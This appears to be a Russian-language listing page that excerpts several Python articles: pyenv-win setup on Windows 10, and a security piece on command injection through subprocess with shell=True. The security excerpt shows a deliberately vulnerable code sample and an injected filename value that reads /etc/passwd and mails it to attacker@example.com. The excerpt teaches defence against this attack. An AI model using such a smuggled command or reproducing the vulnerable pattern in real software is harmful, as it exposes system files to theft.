Урок 6 Ввод и вывод данных Python. Функция print() Python
Несколько версий Python на одном компьютере(Windows 10)
В этой статье описывается, как быстро установить и начать пользоваться pyenv, на хосте с ОС Windows 10. pyenv — утилита, предоставляющая пользователю возможность переключения между различными версиями python Инструкция: 1. Скачать архив https://github.com/pyenv-win/pyenv-win/archive/master.zip 2. Открыть Windows PowerShell 3. Ввести mkdir $HOME/.pyenv 4. Переместить в директорию $HOME/.pyenv (Обычно это здесь: C:\Users\<Имя_пользователя_windows>\.pyenv) директорию pyenv-win и файл .version из архива, который Вы скачали на первом пункте 5...
Уязвимости и безопасность в Python: разбор критических ошибок и стратегии защиты
Использование subprocess.call, os.system или popen с невалидируемым пользовательским вводом — частая ошибка. Пример: python Copy Download import subprocess
def transcode_file(filename):
command = f'ffmpeg -i "{filename}" output.mpg' # Уязвимость!
subprocess.call(command, shell=True) # Параметр shell=True опасен Угроза: Злоумышленник может передать filename вида "; cat /etc/passwd | mail attacker@example.com, выполнив произвольные команды. Решение: python Copy Download subprocess.call(['ffmpeg', '-i', shlex...